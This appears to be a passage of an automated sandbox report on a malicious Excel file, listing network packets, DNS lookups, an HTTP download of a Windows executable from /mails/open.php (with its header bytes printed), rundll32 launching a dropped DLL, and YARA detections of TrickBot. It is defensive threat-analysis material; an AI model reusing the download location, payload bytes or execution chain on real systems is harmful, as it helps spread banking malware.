                                                                                                                                            Feb 20, 2021 02:16:43.882862091 CET4916580192.168.2.22185.81.0.78
                                                                                                                                            Feb 20, 2021 02:16:43.882894993 CET4916580192.168.2.22185.81.0.78
                                                                                                                                            Feb 20, 2021 02:16:43.884835005 CET4916580192.168.2.22185.81.0.78
                                                                                                                                            Feb 20, 2021 02:16:43.942574024 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.942631960 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.942673922 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.942691088 CET4916580192.168.2.22185.81.0.78
                                                                                                                                            Feb 20, 2021 02:16:43.942713976 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.942715883 CET4916580192.168.2.22185.81.0.78
                                                                                                                                            Feb 20, 2021 02:16:43.942722082 CET4916580192.168.2.22185.81.0.78
                                                                                                                                            Feb 20, 2021 02:16:43.942764044 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.942773104 CET4916580192.168.2.22185.81.0.78
                                                                                                                                            Feb 20, 2021 02:16:43.942809105 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.942821980 CET4916580192.168.2.22185.81.0.78
                                                                                                                                            Feb 20, 2021 02:16:43.942850113 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.942864895 CET4916580192.168.2.22185.81.0.78
                                                                                                                                            Feb 20, 2021 02:16:43.942889929 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.942919970 CET4916580192.168.2.22185.81.0.78
                                                                                                                                            Feb 20, 2021 02:16:43.942949057 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.942981005 CET4916580192.168.2.22185.81.0.78
                                                                                                                                            Feb 20, 2021 02:16:43.942987919 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.943025112 CET4916580192.168.2.22185.81.0.78
                                                                                                                                            Feb 20, 2021 02:16:43.943028927 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.943069935 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.943080902 CET4916580192.168.2.22185.81.0.78
                                                                                                                                            Feb 20, 2021 02:16:43.943084955 CET4916580192.168.2.22185.81.0.78
                                                                                                                                            Feb 20, 2021 02:16:43.943119049 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.943119049 CET4916580192.168.2.22185.81.0.78
                                                                                                                                            Feb 20, 2021 02:16:43.943162918 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.943192005 CET4916580192.168.2.22185.81.0.78
                                                                                                                                            Feb 20, 2021 02:16:43.943202019 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.943212986 CET4916580192.168.2.22185.81.0.78
                                                                                                                                            Feb 20, 2021 02:16:43.943242073 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.943259001 CET4916580192.168.2.22185.81.0.78
                                                                                                                                            Feb 20, 2021 02:16:43.943284035 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.943301916 CET4916580192.168.2.22185.81.0.78
                                                                                                                                            Feb 20, 2021 02:16:43.943329096 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.943341017 CET4916580192.168.2.22185.81.0.78
                                                                                                                                            Feb 20, 2021 02:16:43.943371058 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.943392992 CET4916580192.168.2.22185.81.0.78
                                                                                                                                            Feb 20, 2021 02:16:43.943412066 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.943423986 CET4916580192.168.2.22185.81.0.78
                                                                                                                                            Feb 20, 2021 02:16:43.943463087 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.943476915 CET4916580192.168.2.22185.81.0.78
                                                                                                                                            Feb 20, 2021 02:16:43.943509102 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.943512917 CET4916580192.168.2.22185.81.0.78
                                                                                                                                            Feb 20, 2021 02:16:43.943547964 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.943553925 CET4916580192.168.2.22185.81.0.78
                                                                                                                                            Feb 20, 2021 02:16:43.943587065 CET8049165185.81.0.78192.168.2.22
                                                                                                                                            Feb 20, 2021 02:16:43.943592072 CET4916580192.168.2.22185.81.0.78
                                                                                                                                            Feb 20, 2021 02:16:43.943627119 CET8049165185.81.0.78192.168.2.22

                                                                                                                                            UDP Packets

                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Feb 20, 2021 02:16:43.609155893 CET5219753192.168.2.228.8.8.8
                                                                                                                                            Feb 20, 2021 02:16:43.670814037 CET53521978.8.8.8192.168.2.22
                                                                                                                                            Feb 20, 2021 02:18:53.927275896 CET5309953192.168.2.228.8.8.8
                                                                                                                                            Feb 20, 2021 02:18:53.986989021 CET53530998.8.8.8192.168.2.22
                                                                                                                                            Feb 20, 2021 02:18:53.993416071 CET5283853192.168.2.228.8.8.8
                                                                                                                                            Feb 20, 2021 02:18:54.043324947 CET53528388.8.8.8192.168.2.22
                                                                                                                                            Feb 20, 2021 02:18:56.465553999 CET6120053192.168.2.228.8.8.8
                                                                                                                                            Feb 20, 2021 02:18:56.518466949 CET53612008.8.8.8192.168.2.22
                                                                                                                                            Feb 20, 2021 02:18:56.523504972 CET4954853192.168.2.228.8.8.8
                                                                                                                                            Feb 20, 2021 02:18:56.574853897 CET53495488.8.8.8192.168.2.22

                                                                                                                                            DNS Queries

                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                            Feb 20, 2021 02:16:43.609155893 CET192.168.2.228.8.8.80x8c10Standard query (0)www.chipmania.itA (IP address)IN (0x0001)
                                                                                                                                            Feb 20, 2021 02:18:56.465553999 CET192.168.2.228.8.8.80xa6edStandard query (0)api.ip.sbA (IP address)IN (0x0001)
                                                                                                                                            Feb 20, 2021 02:18:56.523504972 CET192.168.2.228.8.8.80x4a40Standard query (0)api.ip.sbA (IP address)IN (0x0001)

                                                                                                                                            DNS Answers

                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                            Feb 20, 2021 02:16:43.670814037 CET8.8.8.8192.168.2.220x8c10No error (0)www.chipmania.itchipmania.itCNAME (Canonical name)IN (0x0001)
                                                                                                                                            Feb 20, 2021 02:16:43.670814037 CET8.8.8.8192.168.2.220x8c10No error (0)chipmania.it185.81.0.78A (IP address)IN (0x0001)
                                                                                                                                            Feb 20, 2021 02:18:56.518466949 CET8.8.8.8192.168.2.220xa6edNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                            Feb 20, 2021 02:18:56.574853897 CET8.8.8.8192.168.2.220x4a40No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)

                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                            • www.chipmania.it

                                                                                                                                            HTTP Packets

                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            0192.168.2.2249165185.81.0.7880C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 20, 2021 02:16:43.753083944 CET0OUTGET /mails/open.php HTTP/1.1
                                                                                                                                            Accept: */*
                                                                                                                                            UA-CPU: AMD64
                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                            Host: www.chipmania.it
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Feb 20, 2021 02:16:43.822292089 CET2INHTTP/1.1 200 OK
                                                                                                                                            Date: Sat, 20 Feb 2021 01:16:43 GMT
                                                                                                                                            Server: Apache
                                                                                                                                            Content-Disposition: attachment; filename="8.jjkes"
                                                                                                                                            Upgrade: h2,h2c
                                                                                                                                            Connection: Upgrade, Keep-Alive
                                                                                                                                            Keep-Alive: timeout=1, max=100
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                            Data Raw: 32 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd 2a 96 79 f9 4b f8 2a f9 4b f8 2a f9 4b f8 2a a2 23 fb 2b f3 4b f8 2a a2 23 fd 2b 7e 4b f8 2a a2 23 fc 2b eb 4b f8 2a 01 3b fc 2b f6 4b f8 2a 01 3b fb 2b e8 4b f8 2a a2 23 f9 2b fc 4b f8 2a f9 4b f9 2a 9a 4b f8 2a 01 3b fd 2b d8 4b f8 2a 4e 3a f1 2b f4 4b f8 2a 4e 3a f8 2b f8 4b f8 2a 4e 3a 07 2a f8 4b f8 2a 4e 3a fa 2b f8 4b f8 2a 52 69 63 68 f9 4b f8 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a4 73 2f 60 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 1b 00 72 42 00 00 a4 03 00 00 00 00 00 c2 7d 41 00 00 10 00 00 00 90 42 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 46 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 20 8f 44 00 60 01 00 00 80 90 44 00 3c 00 00 00 00 c0 44 00 58 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 46 00 b0 11 00 00 60 81 44 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 81 44 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 42 00 58 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 df 71 42 00 00 10 00 00 00 72 42 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 18 08 02 00 00 90 42 00 00 0a 02 00 00 76 42 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 15 00 00 00 a0 44 00 00 0a 00 00 00 80 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 58 70 01 00 00 c0 44 00 00 72 01 00 00 8a 44 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 b0 11 00 00 00 40 46 00 00 12 00 00 00 fc 45 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 1a e6 68 07 ba 91 2f 00 00 33 c9 e8 ff 3c 08 00 6a 00 ff d0 33 c0 c3 cc cc cc cc cc cc cc cc b8
                                                                                                                                            Data Ascii: 2000MZ@!L!This program cannot be run in DOS mode.$*yK*K*K*#+K*#+~K*#+K*;+K*;+K*#+K*K*K*;+K*N:+K*N:+K*N:*K*N:+K*RichK*PELs/`!rB}AB`F@ D`D<DXp@F`DpD@BX.textqBrB `.rdataBvB@@.data8DD@.rsrcXpDrD@@.reloc@FE@Bhh/3<j3


                                                                                                                                            Code Manipulations

                                                                                                                                            Statistics

                                                                                                                                            Behavior

                                                                                                                                            Click to jump to process

                                                                                                                                            System Behavior

                                                                                                                                            General

                                                                                                                                            Start time:02:16:34
                                                                                                                                            Start date:20/02/2021
                                                                                                                                            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                            Imagebase:0x13f180000
                                                                                                                                            File size:27641504 bytes
                                                                                                                                            MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high

                                                                                                                                            General

                                                                                                                                            Start time:02:16:40
                                                                                                                                            Start date:20/02/2021
                                                                                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:rundll32 ..\BASE.BABAA,DllRegisterServer
                                                                                                                                            Imagebase:0xff7b0000
                                                                                                                                            File size:45568 bytes
                                                                                                                                            MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high

                                                                                                                                            General

                                                                                                                                            Start time:02:16:40
                                                                                                                                            Start date:20/02/2021
                                                                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:rundll32 ..\BASE.BABAA,DllRegisterServer
                                                                                                                                            Imagebase:0xea0000
                                                                                                                                            File size:44544 bytes
                                                                                                                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000003.2087111126.0000000000374000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000003.2087119613.0000000000374000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2091202267.0000000000340000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2091126228.0000000000270000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2091382187.0000000000968000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                            Reputation:moderate

                                                                                                                                            General

                                                                                                                                            Start time:02:16:42
                                                                                                                                            Start date:20/02/2021
                                                                                                                                            Path:C:\Windows\System32\wermgr.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\wermgr.exe
                                                                                                                                            Imagebase:0xffe40000
                                                                                                                                            File size:50688 bytes
                                                                                                                                            MD5 hash:41DF7355A5A907E2C1D7804EC028965D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:moderate

                                                                                                                                            General

                                                                                                                                            Start time:02:16:42
                                                                                                                                            Start date:20/02/2021
                                                                                                                                            Path:C:\Windows\System32\wermgr.exe
                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                            Commandline:C:\Windows\system32\wermgr.exe
                                                                                                                                            Imagebase:0xffe40000
                                                                                                                                            File size:50688 bytes
                                                                                                                                            MD5 hash:41DF7355A5A907E2C1D7804EC028965D
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:moderate

                                                                                                                                            Disassembly

                                                                                                                                            Code Analysis

                                                                                                                                            Reset < >